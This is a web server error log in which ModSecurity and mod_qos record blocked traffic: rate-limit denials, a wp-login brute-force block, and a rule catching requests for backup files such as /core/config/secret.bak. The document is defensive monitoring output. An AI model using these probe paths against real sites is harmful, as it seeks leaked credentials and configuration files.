[Tue May 26 19:54:58.262748 2026] [qos:error] [pid 93868:tid 94360] [client 45.148.10.120:43404] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOkqK9k_ZUB2Vp25NmAAAAfU
[Tue May 26 19:54:58.266804 2026] [qos:error] [pid 86490:tid 86713] [client 45.148.10.120:60128] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOlZMwN0DpLVWo6LJcgAAAOI
[Tue May 26 19:54:58.271120 2026] [qos:error] [pid 86490:tid 86648] [client 45.148.10.120:49336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOlZMwN0DpLVWo6LJcwAAAKE
[Tue May 26 19:54:58.271901 2026] [qos:error] [pid 93868:tid 94300] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtOkqK9k_ZUB2Vp25NmQAAAbk
[Tue May 26 19:54:58.275146 2026] [security2:error] [pid 93868:tid 94296] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOEqK9k_ZUB2Vp25NPgAAAbU"]
[Tue May 26 19:54:58.276989 2026] [security2:error] [pid 93868:tid 94340] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOEqK9k_ZUB2Vp25NPAAAAeE"]
[Tue May 26 19:54:58.279051 2026] [security2:error] [pid 93576:tid 93746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOGDRMqfxdEDkoszUvQAAACI"]
[Tue May 26 19:54:58.283762 2026] [security2:error] [pid 93868:tid 94283] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOEqK9k_ZUB2Vp25NPQAAAag"]
[Tue May 26 19:54:58.284349 2026] [security2:error] [pid 93576:tid 93770] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOGDRMqfxdEDkoszUxAAAADo"]
[Tue May 26 19:54:58.286542 2026] [security2:error] [pid 86490:tid 86704] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOFZMwN0DpLVWo6LI6gAAANk"]
[Tue May 26 19:54:58.295761 2026] [security2:error] [pid 93868:tid 94329] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOEqK9k_ZUB2Vp25NOwAAAdY"]
[Tue May 26 19:54:58.308918 2026] [security2:error] [pid 93576:tid 93838] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOGDRMqfxdEDkoszUywAAAH4"]
[Tue May 26 19:54:58.312050 2026] [security2:error] [pid 93576:tid 93828] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOGDRMqfxdEDkoszUwAAAAHQ"]
[Tue May 26 19:54:58.313192 2026] [security2:error] [pid 93576:tid 93787] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOGDRMqfxdEDkoszUwwAAAEs"]
[Tue May 26 19:54:58.313203 2026] [security2:error] [pid 93576:tid 93718] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOGDRMqfxdEDkoszU0wAAAAY"]
[Tue May 26 19:54:58.335614 2026] [security2:error] [pid 93576:tid 93792] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOGDRMqfxdEDkoszUygAAAFA"]
[Tue May 26 19:54:58.340265 2026] [security2:error] [pid 93576:tid 93834] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOWDRMqfxdEDkoszU6AAAAHo"]
[Tue May 26 19:54:58.341387 2026] [security2:error] [pid 86490:tid 86636] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOFZMwN0DpLVWo6LI9wAAAJU"]
[Tue May 26 19:54:58.345405 2026] [security2:error] [pid 93868:tid 94293] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOEqK9k_ZUB2Vp25NUwAAAbI"]
[Tue May 26 19:54:58.363383 2026] [security2:error] [pid 86490:tid 86739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOVZMwN0DpLVWo6LJKgAAAPw"]
[Tue May 26 19:54:58.370675 2026] [security2:error] [pid 93868:tid 94369] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOEqK9k_ZUB2Vp25NQgAAAf4"]
[Tue May 26 19:54:58.371692 2026] [security2:error] [pid 86490:tid 86743] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOFZMwN0DpLVWo6LI-AAAAQA"]
[Tue May 26 19:54:58.373262 2026] [security2:error] [pid 93868:tid 94286] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOUqK9k_ZUB2Vp25NbgAAAas"]
[Tue May 26 19:54:58.378064 2026] [security2:error] [pid 93576:tid 93723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOGDRMqfxdEDkoszUzgAAAAs"]
[Tue May 26 19:54:58.380990 2026] [security2:error] [pid 93576:tid 93742] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOWDRMqfxdEDkoszU5QAAAB4"]
[Tue May 26 19:54:58.384496 2026] [security2:error] [pid 93576:tid 93772] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOWDRMqfxdEDkoszU6QAAADw"]
[Tue May 26 19:54:58.385298 2026] [security2:error] [pid 86490:tid 86649] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOVZMwN0DpLVWo6LJNwAAAKI"]
[Tue May 26 19:54:58.390546 2026] [security2:error] [pid 86490:tid 86659] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOVZMwN0DpLVWo6LJKwAAAKw"]
[Tue May 26 19:54:58.391835 2026] [security2:error] [pid 93868:tid 94341] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOEqK9k_ZUB2Vp25NPwAAAeI"]
[Tue May 26 19:54:58.412980 2026] [security2:error] [pid 86490:tid 86705] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOFZMwN0DpLVWo6LI7QAAANo"]
[Tue May 26 19:54:58.419641 2026] [security2:error] [pid 93576:tid 93714] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOWDRMqfxdEDkoszU5gAAAAI"]
[Tue May 26 19:54:58.419687 2026] [security2:error] [pid 86490:tid 86725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOVZMwN0DpLVWo6LJPAAAAO4"]
[Tue May 26 19:54:58.425505 2026] [security2:error] [pid 93576:tid 93720] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOGDRMqfxdEDkoszU0AAAAAg"]
[Tue May 26 19:54:58.425564 2026] [security2:error] [pid 93868:tid 94370] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOUqK9k_ZUB2Vp25NbQAAAf8"]
[Tue May 26 19:54:58.431520 2026] [security2:error] [pid 93576:tid 93782] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOWDRMqfxdEDkoszU7QAAAEY"]
[Tue May 26 19:54:58.440961 2026] [security2:error] [pid 86490:tid 86644] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOVZMwN0DpLVWo6LJQAAAAJ0"]
[Tue May 26 19:54:58.442400 2026] [security2:error] [pid 86490:tid 86679] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOVZMwN0DpLVWo6LJOwAAAMA"]
[Tue May 26 19:54:58.448974 2026] [security2:error] [pid 86490:tid 86654] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOVZMwN0DpLVWo6LJKAAAAKc"]
[Tue May 26 19:54:58.509445 2026] [security2:error] [pid 86490:tid 86615] [remote 123.30.233.13:58346] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahWtOlZMwN0DpLVWo6LJdwABAnw"]
[Tue May 26 19:54:58.612854 2026] [security2:error] [pid 86490:tid 86665] [client 185.177.72.53:56282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/db/site.bak"] [unique_id "ahWtOlZMwN0DpLVWo6LJkgAAALI"]
[Tue May 26 19:54:58.774499 2026] [security2:error] [pid 86490:tid 86733] [client 185.177.72.53:56282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/db/sample.bak"] [unique_id "ahWtOlZMwN0DpLVWo6LJmQAAAPY"]
[Tue May 26 19:54:59.277534 2026] [security2:error] [pid 86490:tid 86642] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOVZMwN0DpLVWo6LJTAAAAJs"]
[Tue May 26 19:54:59.282098 2026] [security2:error] [pid 86490:tid 86625] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOVZMwN0DpLVWo6LJSQAAAIo"]
[Tue May 26 19:54:59.287099 2026] [security2:error] [pid 86490:tid 86721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOVZMwN0DpLVWo6LJPwAAAOo"]
[Tue May 26 19:54:59.294209 2026] [security2:error] [pid 93576:tid 93809] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOWDRMqfxdEDkoszU6wAAAGE"]
[Tue May 26 19:54:59.295971 2026] [security2:error] [pid 93576:tid 93788] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOWDRMqfxdEDkoszU7AAAAEw"]
[Tue May 26 19:54:59.315304 2026] [security2:error] [pid 93868:tid 94259] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOUqK9k_ZUB2Vp25NegAAAZA"]
[Tue May 26 19:54:59.331070 2026] [security2:error] [pid 86490:tid 86677] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOVZMwN0DpLVWo6LJVQAAAL4"]
[Tue May 26 19:54:59.343419 2026] [security2:error] [pid 93868:tid 94281] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOUqK9k_ZUB2Vp25NfQAAAaY"]
[Tue May 26 19:54:59.344321 2026] [security2:error] [pid 86490:tid 86670] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOVZMwN0DpLVWo6LJVgAAALc"]
[Tue May 26 19:54:59.346423 2026] [security2:error] [pid 86490:tid 86688] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOlZMwN0DpLVWo6LJggAAAMk"]
[Tue May 26 19:54:59.349844 2026] [security2:error] [pid 93576:tid 93719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOWDRMqfxdEDkoszU8wAAAAc"]
[Tue May 26 19:54:59.352017 2026] [security2:error] [pid 93868:tid 94263] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOkqK9k_ZUB2Vp25NnAAAAZQ"]
[Tue May 26 19:54:59.352022 2026] [security2:error] [pid 93868:tid 94350] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOUqK9k_ZUB2Vp25NewAAAes"]
[Tue May 26 19:54:59.353602 2026] [security2:error] [pid 93576:tid 93804] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOWDRMqfxdEDkoszU7wAAAFw"]
[Tue May 26 19:54:59.356325 2026] [security2:error] [pid 93576:tid 93740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOmDRMqfxdEDkoszVBwAAABw"]
[Tue May 26 19:54:59.366448 2026] [security2:error] [pid 93868:tid 94326] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOUqK9k_ZUB2Vp25NdQAAAdM"]
[Tue May 26 19:54:59.367310 2026] [security2:error] [pid 93868:tid 94353] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOUqK9k_ZUB2Vp25NeAAAAe4"]
[Tue May 26 19:54:59.379262 2026] [security2:error] [pid 86490:tid 86687] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOVZMwN0DpLVWo6LJSgAAAMg"]
[Tue May 26 19:54:59.386257 2026] [security2:error] [pid 93868:tid 94317] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOkqK9k_ZUB2Vp25NnQAAAco"]
[Tue May 26 19:54:59.409554 2026] [security2:error] [pid 93576:tid 93800] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOmDRMqfxdEDkoszVCAAAAFg"]
[Tue May 26 19:54:59.411146 2026] [security2:error] [pid 93868:tid 94330] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOkqK9k_ZUB2Vp25NqgAAAdc"]
[Tue May 26 19:54:59.415821 2026] [security2:error] [pid 93576:tid 93749] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOWDRMqfxdEDkoszU8AAAACU"]
[Tue May 26 19:54:59.416489 2026] [security2:error] [pid 93576:tid 93735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOmDRMqfxdEDkoszVEgAAABc"]
[Tue May 26 19:54:59.423025 2026] [security2:error] [pid 93576:tid 93784] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOmDRMqfxdEDkoszVEwAAAEg"]
[Tue May 26 19:54:59.425710 2026] [security2:error] [pid 86490:tid 86656] [client 185.177.72.53:56282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/core/config/secret.bak"] [unique_id "ahWtO1ZMwN0DpLVWo6LJxAAAAKk"]
[Tue May 26 19:54:59.427510 2026] [security2:error] [pid 93576:tid 93826] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOmDRMqfxdEDkoszVCQAAAHI"]
[Tue May 26 19:54:59.428556 2026] [security2:error] [pid 93868:tid 94260] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOkqK9k_ZUB2Vp25NqQAAAZE"]
[Tue May 26 19:54:59.434408 2026] [security2:error] [pid 93868:tid 94364] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOkqK9k_ZUB2Vp25NqAAAAfk"]
[Tue May 26 19:54:59.443887 2026] [security2:error] [pid 93868:tid 94312] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOkqK9k_ZUB2Vp25NqwAAAcU"]
[Tue May 26 19:54:59.444425 2026] [security2:error] [pid 93576:tid 93744] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtOmDRMqfxdEDkoszVDwAAACA"]
[Tue May 26 19:54:59.580161 2026] [qos:error] [pid 86490:tid 86721] [client 45.148.10.120:60128] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtO1ZMwN0DpLVWo6LJ1AAAAOo
[Tue May 26 19:54:59.582139 2026] [qos:error] [pid 93576:tid 93776] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtO2DRMqfxdEDkoszVWAAAAEA
